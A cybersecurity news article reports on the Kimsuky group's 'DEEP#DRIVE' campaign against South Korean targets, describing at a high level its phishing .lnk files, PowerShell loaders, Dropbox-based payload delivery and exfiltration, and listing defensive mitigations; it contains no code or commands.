North Korean Hackers Leverage Dropbox and PowerShell Scripts to Breach Organizations

A recent cyberattack campaign, dubbed “DEEP#DRIVE,” has been attributed to the North Korean Advanced Persistent Threat (APT) group, Kimsuky.

The operation, targeting South Korean businesses, government entities, and cryptocurrency users, employs advanced techniques involving Dropbox-hosted payloads and obfuscated PowerShell scripts to infiltrate systems and exfiltrate sensitive data.

Exploiting Trusted Platforms for Malware Delivery

The attackers utilized phishing emails containing malicious shortcut files (.lnk) disguised as legitimate documents, such as work logs and insurance forms.

These files exploited a common Windows behavior of hiding file extensions to trick users into executing malicious code.

Once opened, the .lnk files triggered PowerShell scripts that downloaded additional payloads from Dropbox, a trusted cloud storage platform.

This tactic allowed the attackers to bypass traditional security defenses by blending their activities with normal user behavior.

Key to the campaign’s success was its reliance on Dropbox for both payload delivery and data exfiltration.

By leveraging OAuth token-based authentication for Dropbox API interactions, the attackers seamlessly uploaded reconnaissance data, including system configurations and running processes, to designated folders.

The infrastructure was dynamic and short-lived, with critical Dropbox links being rapidly deactivated to evade detection and complicate analysis.

Multi-Stage Attack Chain

The DEEP#DRIVE campaign followed a sophisticated multi-stage attack chain:

1. Initial Access: Phishing emails distributed .lnk files masquerading as legitimate documents. These files executed obfuscated PowerShell scripts to initiate the attack.
2. Payload Delivery: The scripts downloaded compressed payloads from Dropbox. These payloads were decompressed and executed directly in memory to avoid detection.
3. Persistence: Scheduled tasks were created to ensure the malware’s continued operation. These tasks were disguised as legitimate system updates.
4. Reconnaissance: The malware collected detailed system information, including IP addresses, operating system details, antivirus software, and running processes.
5. Exfiltration: Collected data was uploaded to Dropbox under uniquely named files for each victim.

The attackers employed various obfuscation techniques, such as Base64 encoding and junk code insertion, to evade detection by antivirus software and logging systems.

The tactics, techniques, and procedures (TTPs) observed in DEEP#DRIVE align closely with previous campaigns attributed to Kimsuky.

Known for targeting South Korea, Kimsuky has a history of leveraging trusted platforms like Dropbox for malware distribution and data exfiltration.

According to Securonix, the use of Korean-language phishing lures further reinforces the assessment that South Korea was the primary target.

The campaign highlights the growing trend of threat actors exploiting trusted cloud services to bypass traditional security measures.

By using platforms like Dropbox, attackers can evade network-layer defenses and increase the likelihood of successful infiltration.

To mitigate such threats, organizations are advised to:

• Avoid downloading unsolicited files or attachments from external sources.
• Monitor common malware staging directories, especially user-specific directories like %AppData%.
• Implement robust endpoint logging capabilities to detect PowerShell activity.
• Educate employees on recognizing phishing attempts and suspicious file behaviors.

The DEEP#DRIVE campaign underscores the importance of vigilance in cybersecurity practices as threat actors continue to evolve their methods to exploit trusted platforms and evade detection.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here